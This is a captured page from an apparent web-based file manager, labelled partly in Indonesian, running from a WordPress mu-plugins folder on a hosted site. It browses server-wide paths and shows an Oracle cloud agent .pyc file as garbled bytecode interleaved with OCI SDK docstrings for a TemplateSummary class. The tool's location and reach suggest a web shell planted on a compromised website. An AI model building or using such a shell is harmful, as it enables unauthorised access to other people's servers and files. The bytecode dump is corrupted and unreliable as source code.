📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/shelleycutler.com/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
libexec
›
oracle-cloud-agent
›
plugins
›
osms
›
oci
›
resource_manager
›
📁 models
📍
Lokasi:
/usr/libexec/oracle-cloud-agent/plugins/osms/oci/resource_manager/models
💾
Free:
45.7 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: template_summary.pyc
a O��fj � @ s8 d dl mZmZmZ d dlmZ eG dd� de��ZdS )� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ s� e Zd ZdZdd� Zedd� �Zejdd� �Zedd� �Zejd d� �Zed d� �Z e jdd� �Z ed d� �Z e jdd� �Z edd� �Zejdd� �Zedd� �Zejdd� �Zedd� �Z e jdd� �Z dd� Zdd� Zdd� ZdS ) �TemplateSummaryz- Summary information for a template. c K sZ dddddddd�| _ ddddd d dd�| _d| _d| _d| _d| _d| _d| _d| _dS ) a� Initializes a new TemplateSummary object with values from keyword arguments. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param id: The value to assign to the id property of this TemplateSummary. :type id: str :param compartment_id: The value to assign to the compartment_id property of this TemplateSummary. :type compartment_id: str :param display_name: The value to assign to the display_name property of this TemplateSummary. :type display_name: str :param description: The value to assign to the description property of this TemplateSummary. :type description: str :param is_free_tier: The value to assign to the is_free_tier property of this TemplateSummary. :type is_free_tier: bool :param time_created: The value to assign to the time_created property of this TemplateSummary. :type time_created: datetime :param lifecycle_state: The value to assign to the lifecycle_state property of this TemplateSummary. :type lifecycle_state: str �str�bool�datetime)�id�compartment_id�display_name�description�is_free_tier�time_created�lifecycle_stater � compartmentId�displayNamer � isFreeTier�timeCreated�lifecycleStateN) � swagger_types� attribute_map�_id�_compartment_id� _display_name�_description� _is_free_tier� _time_created�_lifecycle_state)�self�kwargs� r! ��/sparta/input/_build_configuration/image_build+validate/lib/bmcenv/lib64/python3.9/site-packages/oci/resource_manager/models/template_summary.py�__init__ s. #�� zTemplateSummary.__init__c C s | j S )z� Gets the id of this TemplateSummary. Unique identifier of the specified template. :return: The id of this TemplateSummary. :rtype: str �r �r r! r! r"